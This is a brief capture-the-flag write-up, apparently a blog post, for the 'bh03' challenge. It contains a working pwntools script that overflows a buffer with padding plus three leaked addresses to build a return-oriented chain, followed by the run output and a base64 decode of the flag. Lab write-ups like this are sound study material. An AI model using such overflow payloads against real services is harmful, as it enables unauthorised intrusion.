+++
title = "bh03"
+++

Unfortunately, I lost the description for this one. Won't let me access the challenge information after the competition
ended.

Quick and dirty description: ROP chain with no code. They give you some addresses, you ROP across them, get some base64
data and decode it to get the flag.

Below is the code that I used (commented out section was for buffer length discovery):
```python
from pwn import *
import struct

g = cyclic_gen()
p = remote("ggcs-bh03.allyourbases.co", 1337)

p.recvline()
p.recvline()
three = int(p.recvline().split()[2], 16)
print("Three:", hex(three))
two = int(p.recvline().split()[2], 16)
print("Two:", hex(two))
one = int(p.recvline().split()[2], 16)
print("One:", hex(one))

print(p.recvuntil("> ").decode("ascii"))

# Find
#p.sendline(g.get(64))
#resp = int(p.recvline().split()[2], 16)
#resp = struct.pack("<I", resp).decode("ascii")
#print("Found cycle at position", g.find(resp))

# Attack
p.sendline(b"a" * 45 + struct.pack("<I", three) + struct.pack("<I", two) + struct.pack("<I", one))

p.interactive()
```
```text
[+] Opening connection to ggcs-bh03.allyourbases.co on port 1337: Done
Three: 0x5665361b
Two: 0x566535ec
One: 0x566535bd
What say you?
> 
[*] Switching to interactive mode
Return Pointer: 0x5665361b
RmxhZzogUmV
UVE9mdW5jVGl
PTi0xOTkw
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
```

Taking these and b64ing them:
```bash
echo "RmxhZzogUmVUVE9mdW5jVGlPTi0xOTkw" | base64 -d
```
```text
Flag: ReTTOfuncTiON-1990
```